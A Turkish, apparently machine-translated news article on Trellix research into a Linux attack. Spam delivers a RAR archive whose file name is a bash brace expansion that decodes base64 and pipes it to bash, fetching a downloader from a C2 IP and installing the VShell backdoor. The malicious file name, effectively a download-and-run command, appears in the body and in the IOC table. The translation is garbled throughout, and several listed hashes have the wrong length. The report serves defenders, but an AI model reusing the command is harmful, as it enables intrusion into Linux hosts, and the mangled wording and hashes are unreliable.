Trellix Advanced Araştırma Merkezi, Linux ana bilgisayarlarını tehlikeye atmak için bir dosya adından başka bir şeyden başka bir şey yapmayan bir enfeksiyon zinciri ortaya çıkardı.
Bir güzellik ürünü anketi olarak görünen bir spam mesajı küçük bir ödül sunar ve bir rar arşivi YY.rar taşır. Paketlendiğinde, arşiv adı minyatür bir bash programı olan tek bir dosya bırakır: ziliao2.pdf {echo, kgn1cmwglwzzu0wglw0xodagahr0cdovlzq3ljk4lje5nc42mdo4mdg0l3nsd3x8 d2dldcatvde4mcatcsBodhrwoi8vndcuotgumtk0ljywojgwodqvc2x3kxxzacag} _ {Base64, -d} _bash
Diş telleri Bash’ın “Proses Genişletme” sözdiziminden yararlanır. Dosya adlarını numaralandıran herhangi bir tapınmayan döngü *in *için f için düşünür; Echo “$ f” veya bir LS çevresindeki bir değerlendirme, diş telleri içindeki içeriği körü körüne değerlendirir, bir baz64 blobunu yansıtır, anında kod çözer ve düz metni bash’a borular.
Geleneksel yürütülebilir bit veya makro gerekmez; Yükü patlatmak için rutin bir envanter komut dosyası veya günlük koleksiyoncusu yeterlidir.
Kod çözülmüş aşama-1 komut dosyası 47.98.194.60:8084’e ulaşır ve sessizce ikinci bir bash indiricisini alır.
Kalıcılık, /tmp, /usr /local /bin ve /usr /libexec gibi yolun genişletilmesi ve yazılabilir dizinlerin araştırılmasıyla elde edilir.
Komut dosyası parmak izi, ana bilgisayarın CPU’su (x86_64, i386, armv7l, aarch64) ve eşleşen elf yükleyicisini çeker, ardından oturum sonlandırmalarından kurtulmak için arka planda nohup ile çağırır.
Her kopya denemesi, diskteki adli eserleri en aza indirerek /dev /null’a yönlendirilir.
Snowlight ailesi ile güçlü bir şekilde ilişkili olan Stage-2 Elf Yükleyicisi, ana bilgisayar etiketi, mimari tanımlayıcı ve dinleme bağlantı noktası içeren bir HTTP GET inşa eder, ardından Xor-Meclishered ikili bir blob toplar.
Bellekte tek baytlı bir anahtar (0x99) uygulanır, bundan sonra program ortaya çıkan yükü Fexecve () aracılığıyla yürütür ve arka kapıyı diski tamamen uzak tutar. Yinelenen enfeksiyonları önlemek için, lansmandan önce bir işaretleyici dosyası /tmp/log_de.log kontrol edilir.
Son olarak, ‘Argv süreci, iyi huylu bir çekirdek işçisi ipliğini taklit etmek için yeniden yazılır [kworker/0:2] PS veya üst denetimler sırasında düz görüşte gizlenmesini sağlamak.
Vshell arka kapı özellikleri
Kötü çözülmüş yük, birkaç Çin APT ekibi tarafından tercih edilen GO tabanlı bir uzaktan erişim aracı olan Vshell’dir. VShell, etkileşimli ters kabuklar, dosya yükleme/indirme, işlem listesi ve bağlantı noktası sağlama sağlar.
HTTP C2 kanalı özel XOR rutinlerine sarılır ve ikili dosyaları birden fazla mimari için derlenir, bu da kampanyayı bulut sunucuları, IoT cihazları ve geliştirme iş istasyonları için eşit derecede tehlikeli hale getirir.
Rapora göre, kampanya aynı anda üç geleneksel algılama katmanını atlıyor: Antivirüs motorları nadiren dosya adları tarama, statik tarayıcılar, engelleme zincirini kaçırıyor ve davranışsal araçlar dosya adı genişletilinceye kadar yürütmeyi işaretleyemez.
Birçok DevOps, yedekleme ve izleme komut dosyaları, girdi sterilize etmeden dizinler aracılığıyla tekrarladığından, teknik Linux’u çekici kılan şeffaflığı ve esnekliği silahlandırır.
Azaltma, katı giriş sanitasyonu (örneğin dosya adları için printf ‘%q’), değerlendirmenin bakım komut dosyalarından çıkarılması ve /tmp veya / /usr /local /bin içindeki geçici ikili dosyalardan anormal giden HTTP isteklerinin izlenmesi gerekir. Güvenlik ekipleri ayrıca sahte çekirdek iplikleri ve FEXECVE’nin olağandışı kullanımlarını avlamalıdır.
Uzlaşma göstergeleri
| Gösterge Türü | Değer |
|---|---|
| Arşiv SHA-256 | 5bde055523d3b5b10f002c5d881bed882e60fa47393dfff41d155cab8b72fc5f4 |
| Kötü niyetli dosya adı | ziliao2.pdf {echo, kgn1cmwglwzzu0wglw0xodagahr0cdovlzq3ljk4lje5nc42mdo4mdg0l3nsd3x8 d2dldcatvde4mcatcsBodhrwoi8vndcuotgumtk0ljywojgwodqvc2x3kxxzacag} _ {Base64, -d} _bash |
| Aşama-1 komut dosyası SHA-256 | 8ef56b48ac164482ddff6a80f7367298d7b4d21be3aaaad0eee1d82d63e3ac0c0a |
| Aşama-2 ELF SHA-256 | 72702d6db671dc75e2e6caf15f98b752df6125a43dae71cda3d305d989cf4 |
| Aşama-2 ELF SHA-256 | 5712D8A629D607C86A9D094DD24B4747B212D5A3B68AD7F10A84DD6D6FAC751 |
| Aşama-2 ELF SHA-256 | Dd1b1e6d548b32a3cde72418f1fb7735e42142676266641a9bb12447303e871 |
| Aşama-2 ELF SHA-256 | 69e9eabfd18445352ece9383be55077cdb5bfb790a30a86758bc5249ff6b45bb |
| Vshell sha-256 | 73000AB2F68ECF2764AF13D1B7B9F0312D585A75BFF7E51CD7B906B36E2D4 |
| C2 IP | 47.98.194.60 |
Bu haberi ilginç bul! Anında güncellemeler almak için bizi Google News, LinkedIn ve X’te takip edin!